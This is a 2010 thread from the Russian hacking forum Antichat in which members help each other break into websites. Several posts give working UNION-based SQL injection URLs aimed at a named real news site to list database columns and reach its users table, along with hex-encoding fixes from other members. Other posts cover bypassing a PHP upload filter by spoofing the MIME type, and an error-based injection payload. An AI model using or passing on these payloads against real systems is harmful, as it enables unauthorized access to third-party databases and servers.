ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11971  
Старый 13.03.2010, 19:09
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Цитата:
Сообщение от Pashkela  
Ссылку дай и не тупи))) Subquery returns more than 1 row - это и есть вывод ошибки
Ошибка появляется когда через MySQL-Front этот запрос делаю, а в скрипте то тупо белый экран и все
 
Ответить с цитированием

  #11972  
Старый 13.03.2010, 20:50
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
Arrow

Имеется такой код:
PHP код:
$filetype $_FILES['imagen']['type'];
$name   $_FILES['imagen']['name'];
$extension      get_extension($name);
$imagen $id.".".$extension;

if (!((
strpos($filetype"gif") || strpos($filetype"jpeg") || strpos($filetype"bmp"))))

    
$message "Error";

Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?
 
Ответить с цитированием

  #11973  
Старый 13.03.2010, 20:59
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Nek1t  
Имеется такой код:
PHP код:
$filetype $_FILES['imagen']['type'];
$name   $_FILES['imagen']['name'];
$extension      get_extension($name);
$imagen $id.".".$extension;

if (!((
strpos($filetype"gif") || strpos($filetype"jpeg") || strpos($filetype"bmp"))))

    
$message "Error";

Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?
можно, только там дописывается расширение gif, jpg или bmp. Только прозреваю, что двойное расширение и нульбайт не пройдет, ибо $id наверняка задается как цифра (будет файл вида 32.gif или 45.jpg, 65.bmp).


Это случайно не голландский сайт?

Последний раз редактировалось попугай; 13.03.2010 в 21:03..
 
Ответить с цитированием

  #11974  
Старый 13.03.2010, 21:18
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

И снова я
Вот все же не могу разобраться. Вот что ввожу:
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9%20,10,11,12+from+information_schema.columns+where+table_name=%27COLUMN_PRIVILEGES%27+LIMIT+1,1+--+
По идее должны выводится столбцы таблицы COLUMN_PRIVILEGES. Но у меня просто ошибка Что не так делаю?
 
Ответить с цитированием

  #11975  
Старый 13.03.2010, 21:19
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от CyberHunter  
И снова я
Вот все же не могу разобраться. Вот что ввожу:
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9%20,10,11,12+from+information_schema.columns+where+table_name=%27COLUMN_PRIVILEGES%27+LIMIT+1,1+--+
По идее должны выводится столбцы таблицы COLUMN_PRIVILEGES. Но у меня просто ошибка Что не так делаю?
Цитата:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8, 9,10,11,12+from+information_schema.columns+where+t able_name=0x434f4c554d4e5f50524956494c45474553+LIM IT+1,1+--+
Хексить религия не позваляет?
 
Ответить с цитированием

  #11976  
Старый 13.03.2010, 21:44
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Цитата:
Сообщение от попугай  
можно, только там дописывается расширение gif, jpg или bmp.
Код еще раз глянь, расширение берется то, которое пришло: $imagen = $id.".".$extension; //imagename
Цитата:
Сообщение от попугай  
Только прозреваю, что двойное расширение и нульбайт не пройдет, ибо $id наверняка задается как цифра (будет файл вида 32.gif или 45.jpg, 65.bmp).
Ну да, это я еще с начала попробовал.
Цитата:
Сообщение от попугай  
Это случайно не голландский сайт?
Лол, нет.
 
Ответить с цитированием

  #11977  
Старый 13.03.2010, 21:47
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
Хексить религия не позваляет?
Ну с этим понятно, но почему при таком вводе опять ошибка?
Цитата:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8, %209,10,11,12+from+information_schema.columns+wher e+table_name=hex%28%27fusers%27%29+limit+1,1+--+
Или как нужно "хексить" ?
 
Ответить с цитированием

  #11978  
Старый 13.03.2010, 21:52
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Цитата:
Сообщение от CyberHunter  
Ну с этим понятно, но почему при таком вводе опять ошибка?

Или как нужно "хексить" ?

Мдаа, а ты задумывался над тем, что ты написал?)

Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1+--+
 
Ответить с цитированием

  #11979  
Старый 13.03.2010, 21:53
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от CyberHunter  
Ну с этим понятно, но почему при таком вводе опять ошибка?

Или как нужно "хексить" ?
http://ctacok.ru/he.php?c=text2hex
 
Ответить с цитированием

  #11980  
Старый 13.03.2010, 23:16
re-2
Новичок
Регистрация: 24.06.2007
Сообщений: 5
Провел на форуме:
487247

Репутация: 3
По умолчанию

0+or+(select+count(*)+from+information_schema.tabl es+group+by+concat(version(),floor(rand (0)*2)))

как работаит ета sql injection?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ